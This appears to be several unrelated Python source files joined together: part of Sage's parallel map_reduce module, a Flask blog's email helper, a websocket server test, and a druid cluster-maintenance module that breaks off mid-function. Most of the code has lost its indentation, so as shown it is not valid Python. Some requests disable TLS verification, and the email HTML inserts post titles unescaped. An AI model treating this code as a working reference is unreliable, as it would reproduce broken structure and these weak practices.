sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(1)
sage: w = EX._workers[0]
sage: w._todo.append(EX.roots()[0])
sage: w.run_myself()
sage: sleep(int(1))
sage: w._todo.append(None)
sage: EX.get_results()
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
Cleanups::
sage: del EX._results, EX._active_tasks, EX._done, EX._workers
"""
logger.debug("Started")
mapred = self._mapred
reduce_init = mapred.reduce_init
results = mapred._results
self._stats[0] = 0
self._stats[3] = 0
logger.debug("Launching thief")
self._thief = Thread(target=self._thief, name="Thief")
self._thief.start()
self._res = reduce_init()
try:
while True:
try:
node = self._todo.pop()
except IndexError:
node = self.steal()
self.walk_branch_locally(node)
if not self._reduce_locally:
self.send_partial_result()
except AbortError:
logger.debug("Worker Done !")
results.put(self._res)
results.put(None)
self._thief.join()
del self._request
self._read_task.close()
self._write_task.close()
del self._read_task, self._write_task
del self._mapred
del self._stats
logger.debug("Exiting")
def send_partial_result(self):
r"""
Send results to the MapReduce process.
        Send the result stored in ``self._res`` to the master and reinitialize
        it to ``master.reduce_init``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=4)
sage: EX.setup_workers(1)
sage: w = EX._workers[0]
sage: w._res = 4
sage: w.send_partial_result()
sage: w._res
0
sage: EX._results.get()
4
"""
self._mapred._results.put(self._res)
self._res = self._mapred.reduce_init()
def walk_branch_locally(self, node):
r"""
Work locally.
Performs the map/reduce computation on the subtrees rooted at ``node``.
INPUT:
- ``node`` -- the root of the subtree explored.
OUTPUT:
        Nothing; the result is stored in ``self._res``.
This is where the actual work is performed.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=4)
sage: w = RESetMapReduceWorker(EX, 0, True)
sage: def sync(): pass
sage: w.synchronize = sync
sage: w._res = 0
sage: w.walk_branch_locally([])
sage: w._res
x^4 + x^3 + x^2 + x + 1
sage: w.walk_branch_locally(w._todo.pop())
sage: w._res
2*x^4 + x^3 + x^2 + x + 1
sage: while True: w.walk_branch_locally(w._todo.pop())
Traceback (most recent call last):
...
IndexError: pop from an empty deque
sage: w._res
24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
mapred = self._mapred
children = mapred.children
post_process = mapred.post_process
fun = mapred.map_function
reduc = mapred.reduce_function
# logger.debug("Working on %s..." % (node,))
while True:
res = post_process(node)
if res is not None:
self._res = reduc(self._res, fun(res))
newnodes = iter(children(node))
try:
node = next(newnodes)
except StopIteration:
return
self._todo.extend(newnodes)
class RESetMPExample(RESetMapReduce):
r"""
An example of map reduce class.
INPUT:
    - ``maxl`` -- the maximum size of permutations generated (default: `9`).
This computes the generating series of permutations counted by their size
up to size ``maxl``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample()
sage: EX.run()
362880*x^9 + 40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5
+ 24*x^4 + 6*x^3 + 2*x^2 + x + 1
.. SEEALSO:: This is an example of :class:`RESetMapReduce`
"""
def __init__(self, maxl=9):
r"""
TESTS::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample()
<sage.parallel.map_reduce.RESetMPExample object at 0x...>
"""
RESetMapReduce.__init__(self)
from sage.rings.polynomial.polynomial_ring import polygen
from sage.rings.integer_ring import ZZ
self.x = polygen(ZZ, 'x')
self.maxl = maxl
def roots(self):
r"""
Return the empty permutation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample().roots()
[[]]
"""
return [[]]
def children(self, l):
r"""
Return the children of the permutation `l`.
INPUT:
- ``l`` -- a list containing a permutation
OUTPUT:
The lists with ``len(l)`` inserted at all possible positions into ``l``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample().children([1,0])
[[2, 1, 0], [1, 2, 0], [1, 0, 2]]
"""
return [l[:i] + [len(l)] + l[i:]
for i in range(len(l) + 1)] if len(l) < self.maxl else []
def map_function(self, l):
r"""
The monomial associated to the permutation `l`.
INPUT:
- ``l`` -- a list containing a permutation
OUTPUT:
The monomial ``x^len(l)``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample().map_function([1,0])
x^2
"""
return self.x**len(l)
class RESetParallelIterator(RESetMapReduce):
r"""
A parallel iterator for recursively enumerated sets.
This demonstrates how to use :class:`RESetMapReduce` to get an iterator on
a recursively enumerated set for which the computations are done in
parallel.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator([[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 15 else [])
sage: sum(1 for _ in S)
65535
"""
def map_function(self, z):
r"""
Return a singleton tuple.
INPUT:
- ``z`` -- a node
OUTPUT:
The singleton ``(z, )``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 15 else [])
sage: S.map_function([1, 0])
([1, 0],)
"""
return (z,)
reduce_init = tuple
def __iter__(self):
r"""
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 15 else [])
sage: it = iter(S)
sage: next(it) # random
[1, 1, 0]
sage: next(it) # random
[1, 1, 0, 1]
sage: sum(1 for _ in it)
65533
"""
self.setup_workers(reduce_locally=False)
self.start_workers()
active_proc = self._nprocess
while True:
newres = self._results.get()
if newres is not None:
logger.debug("Got some results")
for r in newres:
yield r
else:
active_proc -= 1
if active_proc == 0:
break
self.finish()
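# --- Illustrative sketch (not part of the original module) -------------------
# A minimal, hedged example of how RESetMapReduce can be specialized, in the
# same spirit as RESetMPExample above: it counts binary words of length at most
# ``maxl``. The class name ``BinaryWordsExample`` and the bound ``maxl`` are
# illustrative assumptions only.
class BinaryWordsExample(RESetMapReduce):
    def __init__(self, maxl=10):
        RESetMapReduce.__init__(self)
        self.maxl = maxl

    def roots(self):
        # a single root: the empty word
        return [[]]

    def children(self, w):
        # append 0 or 1 while the word is shorter than maxl
        return [w + [0], w + [1]] if len(w) < self.maxl else []

    def map_function(self, w):
        # each word counts for one; the default reduce_function sums the counts
        return 1
# Expected (serial) usage: BinaryWordsExample(maxl=3).run_serial() == 15,
# that is 1 + 2 + 4 + 8 words of lengths 0, 1, 2 and 3.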
|
emails.py
|
from threading import Thread
from flask import url_for, current_app
from flask_mail import Message
from bluelog.extensions import mail
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_mail(subject, to, html):
app = current_app._get_current_object()
message = Message(subject, recipients=[to], html=html)
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
def send_new_comment_email(post):
post_url = url_for('blog.show_post', post_id=post.id, _external=True) + '#comments'
    send_mail(subject='New comment', to=current_app.config['BLUELOG_EMAIL'],
              html='<p>New comment on post <i>%s</i>, click the link below to view:</p>'
                   '<p><a href="%s">%s</a></p>'
                   '<p><small style="color: #868e96">Do not reply to this email.</small></p>'
                   % (post.title, post_url, post_url))
def send_new_reply_email(comment):
post_url = url_for('blog.show_post', post_id=comment.post_id, _external=True) + '#comments'
    send_mail(subject='New reply', to=comment.email,
              html='<p>New reply to your comment on post <i>%s</i>, click the link below to view:</p>'
                   '<p><a href="%s">%s</a></p>'
                   '<p><small style="color: #868e96">Do not reply to this email.</small></p>'
                   % (comment.post.title, post_url, post_url))
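# --- Illustrative sketch (not part of the original module) -------------------
# A hedged example of how send_mail() might be exercised; the subject, the
# recipient and the passed-in ``app`` object are placeholders, not real
# configuration. send_mail() resolves current_app, so it must be called inside
# an application context.
def _example_send(app):
    with app.app_context():
        thr = send_mail(subject='Test', to='admin@example.com',
                        html='<p>Hello from Bluelog</p>')
        thr.join()  # optional: wait for the background send to finish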
|
test_server.py
|
from unittest import TestCase
import asyncio
import websockets
import threading as th
import time
from server.server import Server
from server import event as e
class TestServer(TestCase):
def test_server_can_be_instantiated(self):
Server()
def test_msg_handlers_are_annotated_and_found_correctly(self):
server = Server()
self.assertEqual(server.handlers[e.TestMsg], server.handle_test_msg)
def test_server_can_register_connection(self):
server = Server()
connection_msg = e.ConnectRequestMsg('test_name')
uri = 'ws://localhost:8765'
server_thread = th.Thread(
target=lambda: server.start('localhost', 8765),
daemon=True)
try:
server_thread.start()
time.sleep(0.01) # give server thread a little time to start
send_test_msg(connection_msg, uri)
self.assertEqual(1, len(server.connections))
finally:
server.end()
server_thread.join()
def test_server_will_reject_repeated_socket_registrations(self):
"""
Server should ignore second and later ConnectRequestMsg sent
by a connected socket.
"""
server = Server()
connection_msg_a = e.ConnectRequestMsg('test_name')
connection_msg_b = e.ConnectRequestMsg('test_name')
uri = 'ws://localhost:8765'
server_thread = th.Thread(
target=lambda: server.start('localhost', 8765),
daemon=True)
try:
server_thread.start()
time.sleep(0.01) # give server thread a little time to start
async def test_send_duplicates():
async with websockets.connect(uri) as web_socket:
await web_socket.send(e.encode_msg(connection_msg_a))
await web_socket.send(e.encode_msg(connection_msg_b))
asyncio.get_event_loop().run_until_complete(test_send_duplicates())
self.assertEqual(1, len(server.connections))
finally:
server.end()
server_thread.join()
def send_test_msg(msg: e.GameMsg, uri):
"""
Sends passed message to passed uri.
Intended to be used for testing effect of sending a message
to a server.
:param msg: GameMsg
:param uri: uri str
:return: None
"""
async def test_send_():
async with websockets.connect(uri) as web_socket:
await web_socket.send(e.encode_msg(msg))
asyncio.get_event_loop().run_until_complete(test_send_())
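# --- Illustrative sketch (not part of the original module) -------------------
# A hedged helper that factors out the start/stop boilerplate repeated in the
# tests above. Only Server.start() and Server.end() are assumed, exactly as the
# tests use them; the host/port defaults mirror the tests.
from contextlib import contextmanager

@contextmanager
def running_server(server: Server, host: str = 'localhost', port: int = 8765):
    server_thread = th.Thread(target=lambda: server.start(host, port), daemon=True)
    server_thread.start()
    time.sleep(0.01)  # give the server thread a little time to start
    try:
        yield server
    finally:
        server.end()
        server_thread.join()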
|
druid.py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import json
import random
import threading
import time
import uuid
from datetime import datetime, timedelta
import requests
from common.http import get, post
from common.log import logger
from datahub.common.const import (
APPEND_FIELDS,
BAD_FIELDS,
BIGINT,
CHECK_DIFF,
CHECK_RESULT,
CLUSTER_NAME,
CONNECTION_INFO,
COUNT,
DATASOURCE,
DRUID,
EXPIRES,
FAILED,
FIELD_NAME,
FIELD_TYPE,
FIELDS,
HOST,
ID,
INFO,
INTERVAL,
JSON_HEADERS,
LOCATION,
LONG,
MESSAGE,
MINTIME,
NAME,
PENDING,
PERIOD,
PHYSICAL_TABLE_NAME,
PORT,
REPORT_TIME,
RESULT_TABLE_ID,
RT_FIELDS,
RUNNING,
SAMPLE,
SEGMENTS,
SIZE,
STATUS,
STORAGE_CLUSTER,
STORAGE_CONFIG,
STORAGES,
STRING,
SUCCESS,
TABLE,
TABLE_RECORD_NUMS,
TABLE_SIZE_MB,
TASK,
TASK_TYPE,
TIMESTAMP,
TYPE,
UNKNOWN,
VARCHAR,
VERSION,
WAITING,
ZOOKEEPER_CONNECT,
)
from datahub.storekit import model_manager
from datahub.storekit.exceptions import (
DruidCreateTaskErrorException,
DruidDeleteDataException,
DruidHttpRequestException,
DruidQueryDataSourceException,
DruidQueryExpiresException,
DruidQueryHistoricalException,
DruidQueryTaskErrorException,
DruidQueryWorkersException,
DruidShutDownTaskException,
DruidUpdateExpiresException,
DruidZkConfException,
DruidZKPathException,
NotSupportTaskTypeException,
)
from datahub.storekit.settings import (
CLEAN_DELTA_DAY,
COORDINATOR,
DEFAULT_DRUID_EXPIRES,
DEFAULT_EXPIRES_RULE,
DEFAULT_MAX_IDLE_TIME,
DEFAULT_SEGMENT_GRANULARITY,
DEFAULT_TASK_MEMORY,
DEFAULT_TIMESTAMP_COLUMN,
DEFAULT_WINDOW_PERIOD,
DRUID_CLEAN_DEEPSTORAGE_TASK_CONFIG_TEMPLATE,
DRUID_COMPACT_SEGMENTS_TASK_CONFIG_TEMPLATE,
DRUID_MAINTAIN_TIMEOUT,
DRUID_VERSION_V1,
DRUID_VERSION_V2,
ENDPOINT_DATASOURCE_RULE,
ENDPOINT_GET_ALL_DATASOURCES,
ENDPOINT_GET_DATASOURCES,
ENDPOINT_GET_PENDING_TASKS,
ENDPOINT_GET_RUNNING_TASKS,
ENDPOINT_GET_RUNNING_WORKERS,
ENDPOINT_HISTORICAL_SIZES,
ENDPOINT_PUSH_EVENTS,
ENDPOINT_RUN_TASK,
ENDPOINT_SHUTDOWN_TASK,
EXCEPT_FIELDS,
EXECUTE_TIMEOUT,
HTTP_REQUEST_TIMEOUT,
INT_MAX_VALUE,
MAINTAIN_DELTA_DAY,
MERGE_BYTES_LIMIT,
MERGE_DAYS_DEFAULT,
OVERLORD,
TASK_CONFIG_TEMPLATE,
TASK_TYPE_PENDING,
TASK_TYPE_RUNNING,
TIME_ZONE_DIFF,
UTC_BEGIN_TIME,
UTC_FORMAT,
ZK_DRUID_PATH,
)
from datahub.storekit.util import translate_expires_day
from django.template import Context, Template
from kazoo.client import KazooClient
def initialize(rt_info):
"""
    Initialize the druid storage for the result table (rt)
    :param rt_info: field and configuration info of the rt
    :return: result of the initialization operation
"""
return prepare(rt_info)
def info(rt_info):
"""
    Get the druid storage information of the rt
    :param rt_info: field and configuration info of the rt
    :return: druid-related info of the rt
"""
druid, physical_tn, conn_info = _get_druid_storage_info(rt_info)
zk_addr = conn_info[ZOOKEEPER_CONNECT]
coordinator = _get_role_leader(zk_addr, COORDINATOR, druid[STORAGE_CLUSTER][VERSION])
    # fetch dimension and metric information
broker_host, broker_port = conn_info[HOST], conn_info[PORT]
schema_url = f"http://{broker_host}:{broker_port}/druid/v2/sql/"
schema_sql = (
'{"query": "SELECT COLUMN_NAME, DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE '
"TABLE_NAME = '%s'\"}" % physical_tn
)
ok, schema = post(schema_url, params=json.loads(schema_sql))
table_schema = {}
if ok and schema:
for e in schema:
table_schema[e["COLUMN_NAME"].lower()] = e["DATA_TYPE"].lower()
logger.info(f"physical_tn: {physical_tn}, schema_url: {schema_url}, schema: {table_schema}")
    # fetch segments info: curl -XGET http://{router_ip:port}/druid/coordinator/v1/datasources/{datasource}
segments_url = f"http://{coordinator}/druid/coordinator/v1/datasources/{physical_tn}"
ok, segments = get(segments_url)
logger.info(f"physical_tn: {physical_tn}, segments_url: {segments_url}, segments: {segments}")
    # fetch sample data
sample_url = f"http://{broker_host}:{broker_port}/druid/v2/sql/"
sample_sql = '{"query": "SELECT * FROM \\"%s\\" ORDER BY __time DESC LIMIT 10"}' % physical_tn
ok, sample = post(sample_url, params=json.loads(sample_sql))
logger.info(f"physical_tn: {physical_tn}, sample_url: {sample_url}, sample_sql: {sample_sql}, sample: {sample}")
druid[INFO] = {TABLE: table_schema, SEGMENTS: segments, SAMPLE: sample}
return druid
def get_task_status(overlord, task_id, druid_version):
"""
    Get the status of the task with the given task_id
    :param druid_version: version of the druid cluster
    :param overlord: leader of the overlord role, in ip:port form
    :param task_id: id of the index task
    :return: status of the index task
"""
    # query task status: curl -XGET http://{overlord}/druid/indexer/v1/task/{task_id}/status
status_url = f"http://{overlord}/druid/indexer/v1/task/{task_id}/status"
    # five possible states: RUNNING, PENDING, WAITING, SUCCESS, FAILED
ok, status = get(status_url)
if not ok:
return UNKNOWN
logger.info(f"task_id: {task_id}, status_url: {status_url}, status: {status}")
runner_status = status[STATUS][STATUS]
if druid_version == DRUID_VERSION_V1:
return runner_status
else:
return runner_status if runner_status in [SUCCESS, FAILED] else status[STATUS]["runnerStatusCode"]
def shutdown_index_task(overlord, task_id):
"""
    Forcibly shut down the task with the given task_id; this can lose peon data, use with caution
    :param overlord: overlord role, in ip:port form
    :param task_id: id of the index task
    :return: status of the index task
"""
    # shut down a task: curl -XPOST http://{router_ip:port}/druid/overlord/v1/task/{task_id}/shutdown
shutdown_url = f"http://{overlord}/druid/indexer/v1/task/{task_id}/shutdown"
    # best-effort shutdown of the druid index task, retry up to 3 times
    for i in range(3):
        try:
            resp = requests.post(shutdown_url, headers=JSON_HEADERS, timeout=HTTP_REQUEST_TIMEOUT)
            if resp.status_code == 200:
                break
            logger.error(
                f"{i} times, shutdown index task failed with task_id: {task_id}, shutdown_url: {shutdown_url}, "
                f"resp.text: {resp.text}"
            )
        except Exception:
            # requests.post may raise before resp is bound, so do not reference resp here
            logger.error(
                f"{i} times, shutdown index task raised an exception, task_id: {task_id}, "
                f"shutdown_url: {shutdown_url}",
                exc_info=True,
            )
def merge_segments(zk_addr, datasource, begin_date, end_date, druid_version, timeout, merge_days):
"""
    Merge, at day granularity, the segments of the given datasource within the given time range
    :param merge_days: number of days to merge
    :param zk_addr: zk connection info
    :param datasource: datasource to merge
    :param begin_date: start date of the merge operation
    :param end_date: end date of the merge operation
    :param druid_version: version of the druid cluster
    :param timeout: timeout of the merge task, in minutes
"""
coordinator = _get_role_leader(zk_addr, COORDINATOR, druid_version)
    # check whether a merge is needed
if not should_merge(coordinator, datasource, begin_date, end_date, merge_days):
return
interval = f"{begin_date}/{end_date}"
overlord = _get_role_leader(zk_addr, OVERLORD, druid_version)
execute_task(DRUID_COMPACT_SEGMENTS_TASK_CONFIG_TEMPLATE, overlord, datasource, interval, druid_version, timeout)
def execute_task(task_template, overlord, datasource, interval, druid_version, timeout=60):
"""
    :param task_template: task config template
    :param overlord: overlord leader process, in ip:port form
    :param datasource: druid datasource name
    :param interval: time interval
    :param druid_version: version of the druid cluster
    :param timeout: task execution timeout, in minutes
"""
data = Template(task_template)
context = Context({DATASOURCE: datasource, INTERVAL: interval})
body = data.render(context)
task_url = f"http://{overlord}/druid/indexer/v1/task"
ok, task = post(task_url, params=json.loads(body))
task_id = task["task"] if ok else ""
logger.info(
f"datasource: {datasource}, overlord: {overlord}, interval: {interval}, task config: {body}, task_id: {task_id}"
)
begin_time = datetime.now()
time_delta = timedelta(minutes=timeout)
while True:
time.sleep(10)
status = get_task_status(overlord, task_id, druid_version)
if status == RUNNING:
if datetime.now() - begin_time > time_delta:
shutdown_index_task(overlord, task_id)
logger.warning(f"datasource: {datasource}, task_id {task_id} timeout, has been shutdown")
return
elif status in [PENDING, WAITING]:
shutdown_index_task(overlord, task_id)
return
else:
return
def clean_unused_segments(cluster_name, druid_version, timeout=60):
"""
    Clean up the unused segments of a single cluster
    :param cluster_name: cluster name
    :param druid_version: version of the druid cluster
    :param timeout: timeout of the clean task, in minutes
    :return: True/False
"""
coordinator = get_leader(cluster_name, COORDINATOR)
ok, datasources_all = get(f"http://{coordinator}{ENDPOINT_GET_ALL_DATASOURCES}")
if not ok or not datasources_all:
return False
ok, datasources_used = get(f"http://{coordinator}{ENDPOINT_GET_DATASOURCES}")
if not ok:
return False
logger.info(f"datasources_all: {datasources_all}, datasources_used: {datasources_used}")
for datasource in datasources_all:
try:
begin_date, end_date = "1000-01-01", "3000-01-01"
if datasource in datasources_used:
coordinator = get_leader(cluster_name, COORDINATOR)
ok, resp = get(f"http://{coordinator}/druid/coordinator/v1/datasources/{datasource}/")
if not ok:
continue
end_date = (
datetime.strptime(resp[SEGMENTS][MINTIME], "%Y-%m-%dT%H:%M:%S.000Z") - timedelta(CLEAN_DELTA_DAY)
).strftime("%Y-%m-%d")
interval = f"{begin_date}/{end_date}"
overlord = get_leader(cluster_name, OVERLORD)
logger.info(f"datasource: {datasource}, overlord: {overlord}, interval: {interval}")
execute_task(
DRUID_CLEAN_DEEPSTORAGE_TASK_CONFIG_TEMPLATE, overlord, datasource, interval, druid_version, timeout
)
except Exception:
logger.warning(f"clean unused segments failed for datasource {datasource}", exc_info=True)
return True
def should_merge(coordinator, datasource, begin_date, end_date, merge_days=MERGE_DAYS_DEFAULT):
"""
    Decide whether the segments of the given datasource within the given time range need to be merged
    (the interval is one day). Merging is not needed when:
    1) the average segment size is greater than 300MB
    2) the average number of segment files per day is less than 2
    :param merge_days: number of days to merge
    :param coordinator: leader node of the coordinator role
    :param datasource: druid datasource name
    :param begin_date: left boundary of the merge interval
    :param end_date: right boundary of the merge interval
    :return: True/False
"""
segments_url = (
f"http://{coordinator}/druid/coordinator/v1/datasources/{datasource}/intervals/"
f"{begin_date}_{end_date}?simple"
)
ok, segments = get(segments_url)
    # segments are merged by day; after merging, at most one segment per day is expected
if not ok or len(segments) <= merge_days:
return False
size = 0
file_count = 0
for value in segments.values():
size += value[SIZE]
file_count += value[COUNT]
logger.info(
f"datasource: {datasource}, segments_url: {segments_url}, segments: {segments}, size: {size}, "
f"file_count: {file_count}, status: True"
)
if file_count <= 1 or size > MERGE_BYTES_LIMIT:
return False
return True
def alter(rt_info):
"""
    Modify the druid storage information of the rt
    :param rt_info: field and configuration info of the rt
    :return: result of altering the rt's druid storage
"""
return prepare(rt_info)
def prepare(rt_info):
"""
    Prepare the druid storage associated with the rt (create a new table or add fields to an existing one)
    :param rt_info: configuration info of the rt
:return: True/False
"""
return True
def maintain_merge_segments(zk_addr, physical_tn, expires_day, delta_day, druid_version, timeout, merge_days):
"""
    Merge-segment logic executed from maintain and maintain_all
    :param zk_addr: zk connection info
    :param physical_tn: physical table name
    :param expires_day: number of days to retain data
    :param delta_day: number of days to skip
    :param druid_version: version of the druid cluster
    :param timeout: execution timeout of the druid task
    :param merge_days: number of days to merge
"""
expires_date = (datetime.today() - timedelta(expires_day)).strftime("%Y-%m-%d")
end_date = (datetime.today() - timedelta(delta_day)).strftime("%Y-%m-%d")
begin_date = (datetime.today() - timedelta(delta_day + merge_days)).strftime("%Y-%m-%d")
logger.info(
f"physical_tn: {physical_tn}, expires_day: {expires_day}, begin_date: {begin_date}, end_date: {end_date}"
)
if end_date >= expires_date:
merge_segments(zk_addr, physical_tn, begin_date, end_date, druid_version, timeout, merge_days)
def set_retain_rule(coordinator, cluster_name, physical_tn, expires_day, druid_version):
"""
    Set the data retention rule of a druid datasource
    :param coordinator: leader of the coordinator role, in hostname:port form
    :param cluster_name: cluster name
    :param physical_tn: physical table name
    :param expires_day: number of days to retain data
    :param druid_version: version of the druid cluster
    :return: whether the retention rule was set successfully, True or False
"""
rules = build_retain_rule(druid_version, expires_day)
url = f"http://{coordinator}/druid/coordinator/v1/rules/{physical_tn}"
resp = requests.post(url, data=rules, headers=JSON_HEADERS)
if resp.status_code != 200:
logger.warning(
f"{cluster_name}: failed to set retention rule for datasource {physical_tn}. "
f"status_code: {resp.status_code}, response: {resp.text}"
)
return False
return True
def build_retain_rule(druid_version, expires_day):
"""
    Build the data retention rules
    :param expires_day: number of days to retain data
    :param druid_version: version of the druid cluster
    :return: JSON string
"""
load_rule = {
PERIOD: f"P{expires_day}D",
"includeFuture": True,
"tieredReplicants": {"_default_tier": 2},
TYPE: "loadByPeriod",
}
if druid_version == DRUID_VERSION_V1:
load_rule["tieredReplicants"]["tier_hot"] = 2
rules = [load_rule, {"type": "dropForever"}]
return json.dumps(rules)
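# Hedged illustration (assuming the constants PERIOD == "period" and TYPE == "type"):
# for a non-V1 cluster with expires_day == 7, build_retain_rule above returns a
# JSON string equivalent to
#   [{"period": "P7D", "includeFuture": true,
#     "tieredReplicants": {"_default_tier": 2}, "type": "loadByPeriod"},
#    {"type": "dropForever"}]
# On V1 clusters the load rule additionally carries "tier_hot": 2 in tieredReplicants.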
def kill_waiting_tasks(cluster_name):
"""
    Kill all tasks of the druid cluster that are in the waiting state
    :param cluster_name: cluster name
"""
try:
overlord = get_leader(cluster_name, OVERLORD)
waiting_tasks_url = "http://" + overlord + "/druid/indexer/v1/waitingTasks"
res = requests.get(waiting_tasks_url, verify=False, timeout=HTTP_REQUEST_TIMEOUT)
        waiting_tasks = json.loads(res.text)  # json.loads() no longer accepts an encoding argument
        for task_json in waiting_tasks:
kill_task_url = "http://" + overlord + "/druid/indexer/v1/task/" + task_json[ID] + "/shutdown"
headers = JSON_HEADERS
requests.post(kill_task_url, headers=headers, verify=False)
except Exception:
logger.warning("failed to kill waiting tasks", exc_info=True)
def kill_pending_tasks(cluster_name):
"""
    Kill all tasks of the druid cluster that are in the pending state
    :param cluster_name: cluster name
"""
try:
overlord = get_leader(cluster_name, OVERLORD)
pending_tasks_url = "http://" + overlord + "/druid/indexer/v1/pendingTasks"
res = requests.get(pending_tasks_url, verify=False, timeout=HTTP_REQUEST_TIMEOUT)
        pending_tasks = json.loads(res.text)  # json.loads() no longer accepts an encoding argument
for task_json in pending_tasks:
kill_task_url = "http://" + overlord + "/druid/indexer/v1/task/" + task_json[ID] + "/shutdown"
headers = JSON_HEADERS
requests.post(kill_task_url, headers=headers, verify=False)
except Exception:
logger.warning("failed to kill pending tasks", exc_info=True)
def maintain(rt_info, delta_day=MAINTAIN_DELTA_DAY, timeout=EXECUTE_TIMEOUT, merge_days=MERGE_DAYS_DEFAULT):
"""
    Maintain the druid table's data retention rule according to the user-defined retention time
    :param merge_days: number of days to merge
    :param rt_info: configuration info of the rt
    :param delta_day: date offset for merging segments
    :param timeout: execution timeout of the druid index task
"""
druid, physical_tn, conn_info = _get_druid_storage_info(rt_info)
cluster_name, version = druid[STORAGE_CLUSTER][CLUSTER_NAME], druid[STORAGE_CLUSTER][VERSION]
coordinator = get_leader(cluster_name, COORDINATOR)
expires_day = translate_expires_day(druid[EXPIRES])
    # set the data retention rule
set_retain_rule(coordinator, cluster_name, physical_tn, expires_day, version)
# merge segments
zk_addr = conn_info[ZOOKEEPER_CONNECT]
maintain_merge_segments(zk_addr, physical_tn, expires_day, delta_day, version, timeout, merge_days)
return True
def maintain_all(delta_day=MAINTAIN_DELTA_DAY):
"""
    Maintain the data retention rules of all druid tables according to the user-defined retention time
"""
start = time.time()
    # rt-level maintenance, mainly setting the data retention time
storage_rt_list = model_manager.get_storage_rt_objs_by_type(DRUID)
for rt_storage in storage_rt_list:
try:
conn_info = json.loads(rt_storage.storage_cluster_config.connection_info)
zk_addr = conn_info[ZOOKEEPER_CONNECT]
coordinator = _get_role_leader(zk_addr, COORDINATOR, rt_storage.storage_cluster_config.version)
expires_day = translate_expires_day(rt_storage.expires)
physical_tn = rt_storage.physical_table_name
cluster_name = rt_storage.storage_cluster_config.cluster_name
            # set the data retention rule
set_retain_rule(
coordinator, cluster_name, physical_tn, expires_day, rt_storage.storage_cluster_config.version
)
except Exception:
logger.warning(
f"{rt_storage.storage_cluster_config.cluster_name}: failed to maintain the retention rule of "
f"datasource {rt_storage.physical_table_name}",
exc_info=True,
)
set_rule_finish = time.time()
    # cluster-level maintenance: clean up deep storage and compact segments
cluster_list = model_manager.get_storage_cluster_configs_by_type(DRUID)
check_threads = []
for cluster in cluster_list:
cluster_name = cluster[CLUSTER_NAME]
thread = threading.Thread(target=maintain_druid_cluster, name=cluster_name, args=(cluster_name,))
        # make the thread a daemon so it is terminated when the main thread ends
        thread.daemon = True
check_threads.append(thread)
thread.start()
    # join all threads and wait until every cluster check has finished;
    # use a timeout so a problematic cluster does not block subsequent maintenance tasks
for th in check_threads:
th.join(timeout=DRUID_MAINTAIN_TIMEOUT)
end = time.time()
logger.info(
f"druid maintain_all total time: {end - start}(s), set rule take {set_rule_finish - start}(s), "
f"cluster maintain takes {end - set_rule_finish}(s)"
)
return True
def maintain_druid_cluster(cluster_name):
"""
    Serially maintain the rts of a single cluster: clean up unused data on deep storage and merge small segments
    :param cluster_name: cluster name
"""
cluster = model_manager.get_storage_cluster_config(cluster_name, DRUID)
version = cluster[VERSION]
clean_unused_segments(cluster_name, version, EXECUTE_TIMEOUT)
    # compaction cannot be run on druid 0.11
if version == DRUID_VERSION_V2:
segments_compaction(cluster_name, MAINTAIN_DELTA_DAY, MERGE_DAYS_DEFAULT, EXECUTE_TIMEOUT)
    logger.info(f"{cluster_name}: maintain_druid_cluster finished (clean_unused_segments and segments compaction)")
def check_schema(rt_info):
"""
    Check whether changes to the rt's fields (names, types) satisfy the storage constraints
    :param rt_info: configuration info of the rt
    :return: schema comparison between the rt fields and the storage fields
"""
result = {RT_FIELDS: {}, "druid_fields": {}, CHECK_RESULT: True, CHECK_DIFF: {}}
for field in rt_info[FIELDS]:
if field[FIELD_NAME].lower() in EXCEPT_FIELDS:
continue
result[RT_FIELDS][field[FIELD_NAME]] = field[FIELD_TYPE]
_, physical_tn, conn_info = _get_druid_storage_info(rt_info)
